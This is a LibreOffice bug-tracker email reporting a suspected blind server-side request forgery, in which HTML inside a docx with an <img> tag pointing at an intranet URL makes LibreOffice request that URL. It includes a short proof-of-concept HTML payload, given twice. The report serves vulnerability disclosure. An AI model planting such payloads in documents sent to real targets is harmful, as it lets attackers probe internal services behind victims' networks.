https://bugs.documentfoundation.org/show_bug.cgi?id=165601
Bug ID: 165601
Summary: LibreOffice has a blind SSRF (Server - Side Request
Forgery) vulnerability.
Product: LibreOffice
Version: unspecified
Hardware: All
OS: All
Status: UNCONFIRMED
Severity: normal
Priority: medium
Component: LibreOffice
Assignee: [email protected]
Reporter: [email protected]
Description:
When displaying a docx document containing HTML via LibreOffice, the software
attempts to parse the <img> tags in the HTML, which may lead to Blind SSRF
vulnerabilities. Does the official team have plans to fix this? The payload is
like this. All versions are affected!
Replace src value in img with your intranet service url like oa or something
else.
*****************************payload******************************************
<!DOCTYPE html>
<html lang="en"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:w="urn:schemas-microsoft-com:office:word"
xmlns="http://www.w3.org/TR/REC-html40";>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
<img src="your intranet service url">
<body>
</body>
</html>
Steps to Reproduce:
1. create a new xxx.docx document
2. write a html content
<!DOCTYPE html>
<html lang="en"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:w="urn:schemas-microsoft-com:office:word"
xmlns="http://www.w3.org/TR/REC-html40";>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
<img src="your intranet service url">
<body>
</body>
</html>
3. open the docx with libreoffice
Actual Results:
Libreoffice will parse the html. Attackers can access the intranet URLs through
LibreOffice, although they have no way to obtain the returned content.
Expected Results:
HTML does not need to be parsed.
Reproducible: Always
User Profile Reset: No
Additional Info:
no
--
You are receiving this mail because:
You are the assignee for the bug.
